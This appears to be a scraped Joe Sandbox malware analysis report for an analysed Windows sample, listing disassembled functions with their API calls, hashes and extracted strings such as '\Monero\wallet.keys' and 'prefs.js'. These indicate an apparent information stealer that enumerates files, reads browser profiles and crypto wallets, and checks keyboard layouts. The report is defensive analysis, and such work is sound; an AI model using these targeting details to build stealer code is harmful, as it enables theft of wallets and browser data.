                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 75f850fceca296aa7e4b3d28c1afcdd0e12013295876af9fb40c36209ed15660
                              • Instruction ID: 93f5d5eef478e24fe26a5dd52aa7bf058beee016cdb1dd02bf1e09a89a7e6d33
                              • Opcode Fuzzy Hash: 75f850fceca296aa7e4b3d28c1afcdd0e12013295876af9fb40c36209ed15660
                              • Instruction Fuzzy Hash: 1D5133B55002189FCB34EBB0DC89FE9737CAF58701F44459AF619A6190EB749B888F91
                              Function 00C63EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00C63EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C63EDA
                              • StrCmpCA.SHLWAPI(?,00C70FAC), ref: 00C63F08
                              • StrCmpCA.SHLWAPI(?,00C70FB0), ref: 00C63F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C6406C
                              • FindClose.KERNEL32(000000FF), ref: 00C64081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 091077594c0e3f7a39df7c947eca21f9d2f4b7d09f06f91da13c032f5de47816
                              • Instruction ID: 1d02ef33e75057923c3c68f33122aae3b0e75594cd533bcbf5be8ba6d1cf50bc
                              • Opcode Fuzzy Hash: 091077594c0e3f7a39df7c947eca21f9d2f4b7d09f06f91da13c032f5de47816
                              • Instruction Fuzzy Hash: C95158B1910218AFCB34EBB0DC89EFA737CBF44300F44459AB659A6040EB759B898F95
                              Function 00C5ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00C5ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C5ED55
                              • StrCmpCA.SHLWAPI(?,00C71538), ref: 00C5EDAB
                              • StrCmpCA.SHLWAPI(?,00C7153C), ref: 00C5EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5F2AE
                              • FindClose.KERNEL32(000000FF), ref: 00C5F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: f66646d418a5fc5aaa9f3fc143e93929d1673de3329373ae247f217fef745af0
                              • Instruction ID: 1ae7044966f707fcfcb295c061682cb48bda03c68cbb15e0b663a38eedebe8ab
                              • Opcode Fuzzy Hash: f66646d418a5fc5aaa9f3fc143e93929d1673de3329373ae247f217fef745af0
                              • Instruction Fuzzy Hash: BCE1C1719111189ADB68FB61DCD2EEE7378AF54300F5041A9B50A73092EF306F8ADF92
                              Function 00C5F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C715B8,00C70D96), ref: 00C5F71E
                              • StrCmpCA.SHLWAPI(?,00C715BC), ref: 00C5F76F
                              • StrCmpCA.SHLWAPI(?,00C715C0), ref: 00C5F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00C5FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 389fd319d9dcd12bd458ac94f7277545d820c7019e60b4160705a718220289de
                              • Instruction ID: 8ae68c68ae12fb49addbb2b98c7d6a83727842f991a1bfab2cf912ebf3113ab5
                              • Opcode Fuzzy Hash: 389fd319d9dcd12bd458ac94f7277545d820c7019e60b4160705a718220289de
                              • Instruction Fuzzy Hash: 7FB145759101049BDB38FF60DC96BEE7379AF54300F5081A9E90AA7191EF306B4ADF92
                              Function 00C516D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C7510C,?,?,?,00C751B4,?,?,00000000,?,00000000), ref: 00C51923
                              • StrCmpCA.SHLWAPI(?,00C7525C), ref: 00C51973
                              • StrCmpCA.SHLWAPI(?,00C75304), ref: 00C51989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C51D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00C51DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C51E20
                              • FindClose.KERNEL32(000000FF), ref: 00C51E32
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 5fc64bddabe7ed06781f636e23ab57edb87ab8f3899b4797f82adef897b84952
                              • Instruction ID: 6de04dd76fb6a5c996b9ac2aeaecd563b86aa77bf0555284af6c882e64a48f7e
                              • Opcode Fuzzy Hash: 5fc64bddabe7ed06781f636e23ab57edb87ab8f3899b4797f82adef897b84952
                              • Instruction Fuzzy Hash: AB12DA719101189BDB29FB60DCD6AEE7378AF58300F5441A9B50A73091EF706F89DFA2
                              Function 00C5DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C70C2E), ref: 00C5DE5E
                              • StrCmpCA.SHLWAPI(?,00C714C8), ref: 00C5DEAE
                              • StrCmpCA.SHLWAPI(?,00C714CC), ref: 00C5DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5E3E0
                              • FindClose.KERNEL32(000000FF), ref: 00C5E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: ee34e0a6f0472a5c2268a6376b75fe09131899621225d2e8eeaf9ceab14a8b8d
                              • Instruction ID: a6a8aba2ff1d450786d6ed0d815b74d3e476c51a3e2a8a0c5f5b91eef240af20
                              • Opcode Fuzzy Hash: ee34e0a6f0472a5c2268a6376b75fe09131899621225d2e8eeaf9ceab14a8b8d
                              • Instruction Fuzzy Hash: 9AF1AF718241189ADB35FB61DCD6EEE7378AF58300F9041EAA51A72091EF306B89DF51
                              Function 00C5DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C714B0,00C70C2A), ref: 00C5DAEB
                              • StrCmpCA.SHLWAPI(?,00C714B4), ref: 00C5DB33
                              • StrCmpCA.SHLWAPI(?,00C714B8), ref: 00C5DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5DDCC
                              • FindClose.KERNEL32(000000FF), ref: 00C5DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 08c1dfc17f785669015cc4810a77f953a840d20d277d66cc30d2cd622f5aaec1
                              • Instruction ID: 393dc0393f27a102320b2d80459fcc3844cdcc342d953e332186a5db1862eb0a
                              • Opcode Fuzzy Hash: 08c1dfc17f785669015cc4810a77f953a840d20d277d66cc30d2cd622f5aaec1
                              • Instruction Fuzzy Hash: 809154769002049BCB24FF70DC96AED737DAF88300F408569BD1AA6181EE349B4DDF92
                              Function 0102B6AD Relevance: 12.9, Strings: 9, Instructions: 1670COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: QZy;$b4+$kC?y$o?xY$on~$sk7v$wf{7${m>W$PS
                              • API String ID: 0-1821273058
                              • Opcode ID: 6531dc0621f7cf610176a45e6b426b851a8820deb1ae89c5888c281defc2921b
                              • Instruction ID: fb9603f3afb10ee903eb35091caaf5bdcae2d03483817961d36d317d2fa66f8c
                              • Opcode Fuzzy Hash: 6531dc0621f7cf610176a45e6b426b851a8820deb1ae89c5888c281defc2921b
                              • Instruction Fuzzy Hash: 98B228F360C2049FE3046E2DEC8577AB7E9EF94720F1A493DEAC4C7744EA3598058696
                              Function 0102D274 Relevance: 12.9, Strings: 9, Instructions: 1631COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6u}o$Gtf$KHw$NVs$^Q{+$kje$$pjss$s<Sw$6?k
                              • API String ID: 0-4142855238
                              • Opcode ID: 929f35d4cad41f3de1637d4981a4e26432eb4b0412927a1a25a9909b250502fa
                              • Instruction ID: a9dad26e848af6a6d385482db76d7d1bdbf2e57a19f867e296b20ebe50f95527
                              • Opcode Fuzzy Hash: 929f35d4cad41f3de1637d4981a4e26432eb4b0412927a1a25a9909b250502fa
                              • Instruction Fuzzy Hash: 9AB226F3A0C2049FD3046E2DEC8567AFBE5EF94720F1A4A3DEAC583744EA3559048697
                              Function 00C67B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00C705AF), ref: 00C67BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00C67BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C67C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C67C62
                              • LocalFree.KERNEL32(00000000), ref: 00C67D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 467a2d7601c297bac065eeabae779a17aa0605477d39ee30e75ac3339d3e4c17
